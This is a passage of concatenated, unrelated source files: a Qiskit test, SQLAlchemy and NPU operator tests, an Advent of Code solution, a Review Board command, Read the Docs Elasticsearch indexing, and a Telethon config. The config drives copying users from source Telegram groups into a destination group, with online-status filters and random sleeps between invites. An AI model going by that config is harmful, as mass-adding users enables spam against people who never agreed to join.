quantum_instance = QuantumInstance(backend, shots=100)
result = iqpe.run(quantum_instance)
self.log.debug('top result str label: {}'.format(result['top_measurement_label']))
self.log.debug('top result in decimal: {}'.format(result['top_measurement_decimal']))
self.log.debug('stretch: {}'.format(result['stretch']))
self.log.debug('translation: {}'.format(result['translation']))
self.log.debug('final eigenvalue from IQPE: {}'.format(result['energy']))
self.log.debug('reference eigenvalue: {}'.format(self.ref_eigenval))
self.log.debug('ref eigenvalue (transformed): {}'.format(
(self.ref_eigenval + result['translation']) * result['stretch'])
)
self.log.debug('reference binary str label: {}'.format(decimal_to_binary(
(self.ref_eigenval.real + result['translation']) * result['stretch'],
max_num_digits=num_iterations + 3,
fractional_part_only=True
)))
np.testing.assert_approx_equal(result['energy'], self.ref_eigenval.real, significant=2)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6566 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socks
import datetime
from telethon.tl.types import UserStatusOnline
from telethon.tl.types import UserStatusRecently
from telethon.tl.types import UserStatusLastWeek
from telethon.tl.types import UserStatusLastMonth
from telethon.tl.types import UserStatusEmpty
# Your Telegram API_ID here
tg_api_id = 0
# Your Telegram API_HASH here
tg_api_hash = 'Your Telegram API_HASH here'
# Proxy configuration here, or leave it as None
#proxy = None
proxy = (socks.SOCKS5, 'localhost', 1088)
# multi-client-session keys
client_sessions = [
'YOUR_SESSION_KEYS',
]
# Existing group list
existing_groups = []
# source list (group or supergroup)
source_groups = [
'ENTITY_USERNAME',
]
# destination (group or supergroup)
destination_group = 'ENTITY_USERNAME'
# Filter of UserStatus
# Tips: DO NOT put `UserStatusOffline` in this
filter_user_status_types = [
UserStatusOnline,
UserStatusRecently,
UserStatusLastWeek,
# UserStatusLastMonth,
# UserStatusEmpty,
]
# UserStatusOffline `was_online` limit
filter_user_status_offline_was_online_min = datetime.datetime.now() - datetime.timedelta(weeks=4)
filter_user_status_offline_was_online_max = None
# if display_name is too long, skip
filter_user_display_name_too_much_words_limit = 25
# random relax during inviting actions
rd_sleep_min = 3
rd_sleep_max = 10
|
the-stack_0_6568 | import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import testing
from sqlalchemy.orm import relationship
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from test.orm import _fixtures
class GenerativeQueryTest(fixtures.MappedTest):
run_inserts = "once"
run_deletes = None
@classmethod
def define_tables(cls, metadata):
Table(
"foo",
metadata,
Column("id", Integer, sa.Sequence("foo_id_seq"), primary_key=True),
Column("bar", Integer),
Column("range", Integer),
)
@classmethod
def fixtures(cls):
rows = tuple([(i, i % 10) for i in range(100)])
foo_data = (("bar", "range"),) + rows
return dict(foo=foo_data)
@classmethod
def setup_mappers(cls):
foo = cls.tables.foo
class Foo(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Foo, foo)
def test_selectby(self):
Foo = self.classes.Foo
res = fixture_session().query(Foo).filter_by(range=5)
assert res.order_by(Foo.bar)[0].bar == 5
assert res.order_by(sa.desc(Foo.bar))[0].bar == 95
def test_slice(self):
Foo = self.classes.Foo
sess = fixture_session()
query = sess.query(Foo).order_by(Foo.id)
orig = query.all()
assert query[1] == orig[1]
assert list(query[10:20]) == orig[10:20]
assert list(query[10:]) == orig[10:]
assert list(query[:10]) == orig[:10]
assert list(query[:10]) == orig[:10]
assert list(query[5:5]) == orig[5:5]
assert list(query[10:40:3]) == orig[10:40:3]
# negative slices and indexes are deprecated and are tested
# in test_query.py and test_deprecations.py
assert query[10:20][5] == orig[10:20][5]
def test_aggregate(self):
foo, Foo = self.tables.foo, self.classes.Foo
sess = fixture_session()
query = sess.query(Foo)
assert query.count() == 100
assert sess.query(func.min(foo.c.bar)).filter(
foo.c.bar < 30
).one() == (0,)
assert sess.query(func.max(foo.c.bar)).filter(
foo.c.bar < 30
).one() == (29,)
eq_(
query.filter(foo.c.bar < 30)
.with_entities(sa.func.max(foo.c.bar))
.scalar(),
29,
)
@testing.fails_if(
lambda: testing.against("mysql+mysqldb")
and testing.db.dialect.dbapi.version_info[:4] == (1, 2, 1, "gamma"),
"unknown incompatibility",
)
def test_aggregate_1(self):
foo = self.tables.foo
query = fixture_session().query(func.sum(foo.c.bar))
assert query.filter(foo.c.bar < 30).one() == (435,)
@testing.fails_on("firebird", "FIXME: unknown")
@testing.fails_on(
"mssql",
"AVG produces an average as the original column type on mssql.",
)
def test_aggregate_2(self):
foo = self.tables.foo
query = fixture_session().query(func.avg(foo.c.bar))
avg = query.filter(foo.c.bar < 30).one()[0]
eq_(float(round(avg, 1)), 14.5)
@testing.fails_on(
"mssql",
"AVG produces an average as the original column type on mssql.",
)
def test_aggregate_3(self):
foo, Foo = self.tables.foo, self.classes.Foo
query = fixture_session().query(Foo)
avg_f = (
query.filter(foo.c.bar < 30)
.with_entities(sa.func.avg(foo.c.bar))
.scalar()
)
eq_(float(round(avg_f, 1)), 14.5)
avg_o = (
query.filter(foo.c.bar < 30)
.with_entities(sa.func.avg(foo.c.bar))
.scalar()
)
eq_(float(round(avg_o, 1)), 14.5)
def test_filter(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert query.count() == 100
assert query.filter(Foo.bar < 30).count() == 30
res2 = query.filter(Foo.bar < 30).filter(Foo.bar > 10)
assert res2.count() == 19
def test_order_by(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert query.order_by(Foo.bar)[0].bar == 0
assert query.order_by(sa.desc(Foo.bar))[0].bar == 99
def test_offset_order_by(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert list(query.order_by(Foo.bar).offset(10))[0].bar == 10
def test_offset(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert len(list(query.limit(10))) == 10
class GenerativeTest2(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table("table1", metadata, Column("id", Integer, primary_key=True))
Table(
"table2",
metadata,
Column("t1id", Integer, ForeignKey("table1.id"), primary_key=True),
Column("num", Integer, primary_key=True),
)
@classmethod
def setup_mappers(cls):
table2, table1 = cls.tables.table2, cls.tables.table1
class Obj1(cls.Basic):
pass
class Obj2(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Obj1, table1)
cls.mapper_registry.map_imperatively(Obj2, table2)
@classmethod
def fixtures(cls):
return dict(
table1=(("id",), (1,), (2,), (3,), (4,)),
table2=(
("num", "t1id"),
(1, 1),
(2, 1),
(3, 1),
(4, 2),
(5, 2),
(6, 3),
),
)
def test_distinct_count(self):
table2, Obj1, table1 = (
self.tables.table2,
self.classes.Obj1,
self.tables.table1,
)
query = fixture_session().query(Obj1)
eq_(query.count(), 4)
res = query.filter(
sa.and_(table1.c.id == table2.c.t1id, table2.c.t1id == 1)
)
eq_(res.count(), 3)
res = query.filter(
sa.and_(table1.c.id == table2.c.t1id, table2.c.t1id == 1)
).distinct()
eq_(res.count(), 1)
class RelationshipsTest(_fixtures.FixtureTest):
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
addresses, Order, User, Address, orders, users = (
cls.tables.addresses,
cls.classes.Order,
cls.classes.User,
cls.classes.Address,
cls.tables.orders,
cls.tables.users,
)
cls.mapper_registry.map_imperatively(
User,
users,
properties={
"orders": relationship(
cls.mapper_registry.map_imperatively(
Order,
orders,
properties={
"addresses": relationship(
cls.mapper_registry.map_imperatively(
Address, addresses
)
)
},
)
)
},
)
def test_join(self):
"""Query.join"""
User, Address = self.classes.User, self.classes.Address
session = fixture_session()
q = (
session.query(User)
.join("orders", "addresses")
.filter(Address.id == 1)
)
eq_([User(id=7)], q.all())
def test_outer_join(self):
"""Query.outerjoin"""
Order, User, Address = (
self.classes.Order,
self.classes.User,
self.classes.Address,
)
session = fixture_session()
q = (
session.query(User)
.outerjoin("orders", "addresses")
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(set([User(id=7), User(id=8), User(id=10)]), set(q.all()))
def test_outer_join_count(self):
"""test the join and outerjoin functions on Query"""
Order, User, Address = (
self.classes.Order,
self.classes.User,
self.classes.Address,
)
session = fixture_session()
q = (
session.query(User)
.outerjoin("orders", "addresses")
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(q.count(), 4)
def test_from(self):
users, Order, User, Address, orders, addresses = (
self.tables.users,
self.classes.Order,
self.classes.User,
self.classes.Address,
self.tables.orders,
self.tables.addresses,
)
session = fixture_session()
sel = users.outerjoin(orders).outerjoin(
addresses, orders.c.address_id == addresses.c.id
)
q = (
session.query(User)
.select_from(sel)
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(set([User(id=7), User(id=8), User(id=10)]), set(q.all()))
class CaseSensitiveTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table("Table1", metadata, Column("ID", Integer, primary_key=True))
Table(
"Table2",
metadata,
Column("T1ID", Integer, ForeignKey("Table1.ID"), primary_key=True),
Column("NUM", Integer, primary_key=True),
)
@classmethod
def setup_mappers(cls):
Table2, Table1 = cls.tables.Table2, cls.tables.Table1
class Obj1(cls.Basic):
pass
class Obj2(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Obj1, Table1)
cls.mapper_registry.map_imperatively(Obj2, Table2)
@classmethod
def fixtures(cls):
return dict(
Table1=(("ID",), (1,), (2,), (3,), (4,)),
Table2=(
("NUM", "T1ID"),
(1, 1),
(2, 1),
(3, 1),
(4, 2),
(5, 2),
(6, 3),
),
)
def test_distinct_count(self):
Table2, Obj1, Table1 = (
self.tables.Table2,
self.classes.Obj1,
self.tables.Table1,
)
q = fixture_session().query(Obj1)
assert q.count() == 4
res = q.filter(
sa.and_(Table1.c.ID == Table2.c.T1ID, Table2.c.T1ID == 1)
)
assert res.count() == 3
res = q.filter(
sa.and_(Table1.c.ID == Table2.c.T1ID, Table2.c.T1ID == 1)
).distinct()
eq_(res.count(), 1)
|
the-stack_0_6569 | # Copyright (c) 2020, Huawei Technologies.All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import sys
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class TestHardShrink(TestCase):
def generate_data(self, min_d, max_d, shape, dtype):
input_x = np.random.uniform(min_d, max_d, shape).astype(dtype)
npu_input = torch.from_numpy(input_x)
return npu_input
def cpu_op_exec(self, input_x, lambd):
output = torch.nn.functional.hardshrink(input_x, lambd=lambd)
output = output.numpy()
return output.astype(np.float32)
def npu_op_exec(self, input_x, lambd):
input1 = input_x.to("npu")
output = torch.nn.functional.hardshrink(input1, lambd=lambd)
output = output.to("cpu")
output = output.numpy()
return output
def test_hardshrink_3_3_float32(self, device):
input_x1 = self.generate_data(-1, 1, (3, 3), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_100_100_float32(self, device):
input_x1 = self.generate_data(-1, 1, (100, 100), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_3_3_float16(self, device):
input_x1 = self.generate_data(-1, 1, (3, 3), np.float16)
input_x1_cpu = input_x1.float()
cpu_output1 = self.cpu_op_exec(input_x1_cpu, 0.5).astype(np.float16)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_100_100_float16(self, device):
input_x1 = self.generate_data(-1, 1, (100, 100), np.float16)
input_x1_cpu = input_x1.float()
cpu_output1 = self.cpu_op_exec(input_x1_cpu, 0.5).astype(np.float16)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_10_10_10_10_float32(self, device):
input_x1 = self.generate_data(-1, 1, (10, 10, 10, 10), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
instantiate_device_type_tests(TestHardShrink, globals(), except_for='cpu')
if __name__ == "__main__":
run_tests() |
the-stack_0_6571 | # a(n) is the amount of individuals by day n
# q(n) corresponds to the number of zeroes in day n
n = 256
qmem = [-1 for i in range(n + 10)]
def a(n):
if n == 0: return 1
return a(n-1) + q(n-1)
def q(n):
if n <= 9: return 1 if n == 8 else 0
if qmem[n] != -1: return qmem[n]
qmem[n] = q(n-7) + q(n-9)
return qmem[n]
with open('input') as f:
initial_fish = list(map(int, f.read().split(',')))
s = 0
for fish in initial_fish:
s += a(n + 8 - fish)
print(s)
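# Sanity check (value taken from the puzzle's published example, assuming this
# recurrence models it correctly): with initial fish [3, 4, 3, 1, 2] the total
# after 256 days should be 26984457539.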
|
the-stack_0_6572 | """Management command for disabling an extension."""
from __future__ import unicode_literals
from django.core.management.base import CommandError
from django.utils.translation import ugettext as _
from djblets.util.compat.django.core.management.base import BaseCommand
from reviewboard.extensions.base import get_extension_manager
class Command(BaseCommand):
"""Management command for disabling an extension."""
help = _('Disables an extension.')
def add_arguments(self, parser):
"""Add arguments to the command.
Args:
parser (argparse.ArgumentParser):
The argument parser for the command.
"""
parser.add_argument(
'extension_ids',
metavar='EXTENSION_ID',
nargs='*',
help=_('The ID of the extension to disable.'))
def handle(self, *args, **options):
"""Handle the command.
Args:
            *args (tuple, unused):
                Unused positional arguments.
            **options (dict):
                Options parsed on the command line, including the IDs of
                the extensions to disable.
Raises:
django.core.management.CommandError:
                There was an error with arguments or disabling the extension.
"""
extension_ids = options['extension_ids']
if not extension_ids:
raise CommandError(
_('You must specify an extension ID to disable.'))
extension_mgr = get_extension_manager()
for extension_id in extension_ids:
try:
extension_mgr.disable_extension(extension_id)
except Exception as e:
raise CommandError(
_('Unexpected error disabling extension %s: %s')
% (extension_id, e))
|
the-stack_0_6574 | import csv
import requests
import json
from pprint import pprint
import pandas as pd
from csv import DictWriter
# initializing a fixed token
class EnvVariables:
"""
Initializing env variables
"""
t = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjozLCJpYXQiOjE2MzcxNDI2NjZ9.AkLL2rMRyvSkRoWEg2qbMMvv28-Y94-Hth4Qyh5Nl4c"
base_url = "https://api.prod.sb.codebuckets.in/v3/"
auth = 'auth/oauth'
me = ''
# payload to get the messages as a response
payload = {
"last_id": 0,
"selectedIndex": 0,
"token": t
}
msg_keys = ['id', 'type', 'parent_id', 'updated_at', 'idd', 'data']
csv_keys = [
'd_coords', 'd_link_img', 'd_link_title', 'd_uri', 'id', 'idd', 'parent_id', 'type', 'updated_at'
]
class Parser:
"""
The class where the parsing of the JSON string happens
"""
def __init__(self) -> None:
self.keys = self.thread_keys()
self.thread_list = []
#self.thread_parse_handler()
"""
Action Functions that make changes to values without returning
"""
def thread_parse_handler(self, payload):
self.thread_list = []
# parse thread by thread
for thread in payload:
self.thread_parser(thread)
# check if there are any children keys
try:
thread['children']
except KeyError:
#print("This thread has no children")
continue
for child in thread['children']:
self.thread_parser(child)
return self.thread_list
def thread_parser(self, thread):
thread_dict = {}
for key in self.keys:
# if key is data, then update the dict with the returned dict from
# data parser subroutine
if key == 'data':
thread_dict.update(self.data_parser(thread[key]))
else:
thread_dict[key] = thread[key]
self.thread_list.append(thread_dict)
"""
Return functions, ones that take an input do something and return a value
"""
def data_parser(self,data_payload):
data_dict = {}
for key in data_payload.keys():
data_dict["d_{}".format(key)] = data_payload[key]
return data_dict
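    # e.g. data_parser({'uri': 'https://example.com', 'coords': None})
    #      -> {'d_uri': 'https://example.com', 'd_coords': None}
    # (payload keys above are illustrative; the real ones come from the API)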
# as much as i dislike it, for MVP we are hardcoding the keys
def thread_keys(self):
msg_keys = ['id', 'type', 'parent_id', 'updated_at', 'idd', 'data']
return msg_keys
class Orchestrator(EnvVariables):
"""
"""
def __init__(self) -> None:
self.url = EnvVariables.base_url
self.payload = EnvVariables.payload
self.parser = Parser()
self.orchestrate()
pass
def orchestrate(self):
"""
what runs the orchestrator from inside, and handles pagination when necessary.
"""
start_index = 0
valid_flag = True
length = 1
while valid_flag and length != 0:
valid_flag, jsonstring = self.api_requester(start_index)
print(f"valid run #{start_index/25:n}")
parsed_json = self.request_translator(jsonstring)
thread_list = self.parser.thread_parse_handler(parsed_json)
self.csvwriter(thread_list)
#self.filewriter(thread_list)
#self.sql_loader(thread_list)
#pprint(thread_list)
length = len(thread_list)
#print(f"\n-------------------------- # threads = {length} -------------------------\n")
# call the next page
start_index+=25
def api_requester(self, start_index = 0):
"""
makes the actual api request
"""
self.payload['last_id']=start_index
response = requests.post(url = self.url, data = self.payload)
#print(f"status code: {response.status_code}")
return response.status_code == 200, response.text
def request_translator(self, jsonstring):
"""
takes the response from api requester,
- filters the data key
- json loads converts to python recognizable objects
"""
translated_response = json.loads(jsonstring)
return translated_response['data']
def csvwriter(self, thread_list):
with open('messages.csv','a') as f:
writer = DictWriter(f,fieldnames=EnvVariables.csv_keys)
for dic in thread_list:
writer.writerow(dic)
pass
def filewriter(self, thread_list):
with open("test.json", mode='a') as f:
for dic in thread_list:
json.dump(dic, f, separators=(',',':'))
pass
#! this is not working and hence unused.
def sql_loader(self, thread_list):
cur = self.con.cursor()
while cur:
cur.executemany("INSERT INTO messages VALUES (:d_coords, :d_link_img, :d_link_title, :d_uri, :id, :idd, :parent_id, :type, :updated_at)", thread_list)
self.con.commit()
pass
print("before run")
o = Orchestrator()
print("after run")
|
the-stack_0_6576 | '''10.2 Write a program to read through the mbox-short.txt and figure out the distribution
by hour of the day for each of the messages. You can pull the hour out from the 'From '
line by finding the time and then splitting the string a second time using a colon.
From [email protected] Sat Jan 5 09:14:16 2008
Once you have accumulated the counts for each hour,
print out the counts, sorted by hour as shown below.'''
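# Worked example of the split logic on the sample line above:
#   'From [email protected] Sat Jan 5 09:14:16 2008'.split()[5] -> '09:14:16'
#   '09:14:16'.split(':')[0] -> '09'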
fname = input("Enter file name: ")
try:
#fh = open(fname)
if len(fname) <= 1 :
fname = "mbox-short.txt"
fh = open(fname)
except:
print('invalid entry!')
quit()
count=dict()
for lin in fh:
lin=lin.rstrip()
if not lin.startswith('From '):
continue
words=lin.split()
time=words[5]
hr=time.split(':')
hour=hr[0]
count[hour]=count.get(hour,0)+1
# to print all the emails and the numbers print(count)
lst=list()
for key,val in count.items():
tup=(key,val)
lst.append(tup)
lst=sorted(lst)
for key,val in lst:
print(key,val)
|
the-stack_0_6578 | from __future__ import absolute_import
from django.test import TestCase
from .models import Reporter, Article
class ManyToOneNullTests(TestCase):
def setUp(self):
# Create a Reporter.
self.r = Reporter(name='John Smith')
self.r.save()
# Create an Article.
self.a = Article(headline="First", reporter=self.r)
self.a.save()
# Create an Article via the Reporter object.
self.a2 = self.r.article_set.create(headline="Second")
# Create an Article with no Reporter by passing "reporter=None".
self.a3 = Article(headline="Third", reporter=None)
self.a3.save()
# Create another article and reporter
self.r2 = Reporter(name='Paul Jones')
self.r2.save()
self.a4 = self.r2.article_set.create(headline='Fourth')
def test_get_related(self):
self.assertEqual(self.a.reporter.id, self.r.id)
# Article objects have access to their related Reporter objects.
r = self.a.reporter
self.assertEqual(r.id, self.r.id)
def test_created_via_related_set(self):
self.assertEqual(self.a2.reporter.id, self.r.id)
def test_related_set(self):
# Reporter objects have access to their related Article objects.
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.assertQuerysetEqual(self.r.article_set.filter(headline__startswith='Fir'),
['<Article: First>'])
self.assertEqual(self.r.article_set.count(), 2)
def test_created_without_related(self):
self.assertEqual(self.a3.reporter, None)
# Need to reget a3 to refresh the cache
a3 = Article.objects.get(pk=self.a3.pk)
self.assertRaises(AttributeError, getattr, a3.reporter, 'id')
# Accessing an article's 'reporter' attribute returns None
# if the reporter is set to None.
self.assertEqual(a3.reporter, None)
# To retrieve the articles with no reporters set, use "reporter__isnull=True".
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: Third>'])
# We can achieve the same thing by filtering for the case where the
# reporter is None.
self.assertQuerysetEqual(Article.objects.filter(reporter=None),
['<Article: Third>'])
# Set the reporter for the Third article
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.r.article_set.add(a3)
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>', '<Article: Third>'])
# Remove an article from the set, and check that it was removed.
self.r.article_set.remove(a3)
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: Third>'])
def test_remove_from_wrong_set(self):
self.assertQuerysetEqual(self.r2.article_set.all(), ['<Article: Fourth>'])
# Try to remove a4 from a set it does not belong to
self.assertRaises(Reporter.DoesNotExist, self.r.article_set.remove, self.a4)
self.assertQuerysetEqual(self.r2.article_set.all(), ['<Article: Fourth>'])
def test_assign_clear_related_set(self):
# Use descriptor assignment to allocate ForeignKey. Null is legal, so
# existing members of set that are not in the assignment set are set null
self.r2.article_set = [self.a2, self.a3]
self.assertQuerysetEqual(self.r2.article_set.all(),
['<Article: Second>', '<Article: Third>'])
# Clear the rest of the set
self.r.article_set.clear()
self.assertQuerysetEqual(self.r.article_set.all(), [])
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: First>', '<Article: Fourth>'])
def test_clear_efficiency(self):
r = Reporter.objects.create()
        for _ in range(3):
r.article_set.create()
with self.assertNumQueries(1):
r.article_set.clear()
self.assertEqual(r.article_set.count(), 0) |
the-stack_0_6579 | """
Search indexing classes to index into Elasticsearch.
Django settings that should be defined:
`ES_HOSTS`: A list of hosts where Elasticsearch lives. E.g.
['192.168.1.1:9200', '192.168.2.1:9200']
`ES_DEFAULT_NUM_REPLICAS`: An integer of the number of replicas.
`ES_DEFAULT_NUM_SHARDS`: An integer of the number of shards.
TODO: Handle page removal case in Page.
"""
from __future__ import absolute_import
from builtins import object
import datetime
from elasticsearch import Elasticsearch, exceptions
from elasticsearch.helpers import bulk
from django.conf import settings
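# Example of the Django settings this module reads (values below are
# illustrative assumptions; point ES_HOSTS at your own cluster):
#
#     ES_HOSTS = ['127.0.0.1:9200']
#     ES_DEFAULT_NUM_REPLICAS = 0
#     ES_DEFAULT_NUM_SHARDS = 5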
class Index(object):
"""Base class to define some common methods across indexes."""
# The _index and _type define the URL path to Elasticsearch, e.g.:
# http://localhost:9200/{_index}/{_type}/_search
_index = 'readthedocs'
_type = None
def __init__(self):
self.es = Elasticsearch(settings.ES_HOSTS)
def get_settings(self, settings_override=None):
"""
Returns settings to be passed to ES create_index.
If `settings_override` is provided, this will use `settings_override`
to override the defaults defined here.
"""
default_settings = {
'number_of_replicas': settings.ES_DEFAULT_NUM_REPLICAS,
'number_of_shards': settings.ES_DEFAULT_NUM_SHARDS,
'refresh_interval': '5s',
'analysis': self.get_analysis(),
}
if settings_override:
default_settings.update(settings_override)
return default_settings
def get_analysis(self):
"""
Returns the analysis dict to be used in settings for create_index.
For languages that ES supports we define either the minimal or light
stemming, which isn't as aggressive as the snowball stemmer. We also
define the stopwords for that language.
For all languages we've customized we're using the ICU plugin.
"""
analyzers = {}
filters = {}
# The default is used for fields that need ICU but are composed of
# many languages.
analyzers['default_icu'] = {
'type': 'custom',
'tokenizer': 'icu_tokenizer',
'filter': ['custom_word_delimiter', 'icu_folding', 'icu_normalizer', 'lowercase'],
}
# Customize the word_delimiter filter to set various options.
filters['custom_word_delimiter'] = {
'type': 'word_delimiter',
'preserve_original': True,
}
return {
'analyzer': analyzers,
'filter': filters,
}
def timestamped_index(self):
return '{0}-{1}'.format(
self._index, datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
def create_index(self, index=None):
"""
Creates index.
This uses `get_settings` and `get_mappings` to define the index.
"""
index = index or self._index
body = {
'settings': self.get_settings(),
}
self.es.indices.create(index=index, body=body)
def put_mapping(self, index=None):
index = index or self._index
self.es.indices.put_mapping(self._type, self.get_mapping(), index)
def bulk_index(self, data, index=None, chunk_size=500, parent=None,
routing=None):
"""
Given a list of documents, uses Elasticsearch bulk indexing.
For each doc this calls `extract_document`, then indexes.
`chunk_size` defaults to the elasticsearch lib's default. Override per
your document size as needed.
"""
index = index or self._index
docs = []
for d in data:
source = self.extract_document(d)
doc = {
'_index': index,
'_type': self._type,
'_source': source,
'_id': d['id'],
}
if routing:
doc['_routing'] = routing
docs.append(doc)
# TODO: This doesn't work with the new ES setup.
bulk(self.es, docs, chunk_size=chunk_size)
def index_document(self, data, index=None, parent=None, routing=None):
doc = self.extract_document(data)
kwargs = {
'index': index or self._index,
'doc_type': self._type,
'body': doc,
'id': doc['id']
}
if parent:
kwargs['parent'] = parent
if routing:
kwargs['routing'] = routing
self.es.index(**kwargs)
def delete_document(self, body, index=None, parent=None, routing=None):
kwargs = {
'index': index or self._index,
'doc_type': self._type,
'body': body,
}
if parent:
kwargs['parent'] = parent
if routing:
kwargs['routing'] = routing
return self.es.delete_by_query(**kwargs)
def get_mapping(self):
"""Returns the mapping for this _index and _type."""
raise NotImplementedError()
def extract_document(self, data):
"""Extracts the Elasticsearch document for this object instance."""
raise NotImplementedError()
def update_aliases(self, new_index, delete=True):
"""
Points `_index` to `new_index` and deletes `_index` if delete=True.
The ES `update_aliases` is atomic.
"""
old_index = None
# Get current alias, if any.
try:
aliases = self.es.indices.get_alias(name=self._index)
if aliases and list(aliases.keys()):
old_index = list(aliases.keys())[0]
except exceptions.NotFoundError:
pass
actions = []
if old_index:
actions.append({'remove': {'index': old_index,
'alias': self._index}})
actions.append({'add': {'index': new_index, 'alias': self._index}})
self.es.indices.update_aliases(body={'actions': actions})
# Delete old index if any and if specified.
if delete and old_index:
self.es.indices.delete(index=old_index)
def search(self, body, **kwargs):
return self.es.search(index=self._index, doc_type=self._type,
body=body, **kwargs)
class ProjectIndex(Index):
"""Search index configuration for Projects"""
_type = 'project'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
'properties': {
'id': {'type': 'keyword'},
'name': {'type': 'text', 'analyzer': 'default_icu'},
'description': {'type': 'text', 'analyzer': 'default_icu'},
'slug': {'type': 'keyword'},
'lang': {'type': 'keyword'},
'tags': {'type': 'keyword'},
'privacy': {'type': 'keyword'},
'author': {
'type': 'text',
'analyzer': 'default_icu',
'fields': {
'raw': {
'type': 'keyword',
},
},
},
'url': {'type': 'keyword'},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
'progetto': {'type': 'keyword'},
'publisher': {'type': 'keyword'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'name', 'slug', 'description', 'lang', 'tags', 'author', 'url',
'progetto', 'publisher', 'private')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add project boost.
doc['weight'] = data.get('weight', 1.0)
return doc
class PageIndex(Index):
"""Search index configuration for Pages"""
_type = 'page'
_parent = 'project'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
'properties': {
'id': {'type': 'keyword'},
'sha': {'type': 'keyword'},
'project': {'type': 'keyword'},
'project_id': {'type': 'keyword'},
'version': {'type': 'keyword'},
'path': {'type': 'keyword'},
'taxonomy': {'type': 'keyword'},
'commit': {'type': 'keyword'},
'title': {'type': 'text', 'analyzer': 'default_icu'},
'headers': {'type': 'text', 'analyzer': 'default_icu'},
'content': {'type': 'text', 'analyzer': 'default_icu'},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
'progetto': {'type': 'keyword'},
'publisher': {'type': 'keyword'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'project_id', 'project', 'title', 'headers', 'version', 'path',
'content', 'taxonomy', 'commit', 'progetto', 'publisher', 'private')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add page boost.
doc['weight'] = data.get('weight', 1.0)
return doc
class SectionIndex(Index):
"""Search index configuration for Sections"""
_type = 'section'
_parent = 'page'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
# Commenting this out until we need it.
# 'suggest': {
# "type": "completion",
# "index_analyzer": "simple",
# "search_analyzer": "simple",
# "payloads": True,
# },
'properties': {
'id': {'type': 'keyword'},
'project': {'type': 'keyword'},
'version': {'type': 'keyword'},
'path': {'type': 'keyword'},
'page_id': {'type': 'keyword'},
'commit': {'type': 'keyword'},
'title': {'type': 'text', 'analyzer': 'default_icu'},
'content': {'type': 'text', 'analyzer': 'default_icu'},
'blocks': {
'type': 'object',
'properties': {
'code': {'type': 'text', 'analyzer': 'default_icu'}
}
},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'project', 'title', 'page_id', 'version', 'path', 'content', 'commit')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add page boost.
doc['weight'] = data.get('weight', 1.0)
return doc
|
the-stack_0_6581 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
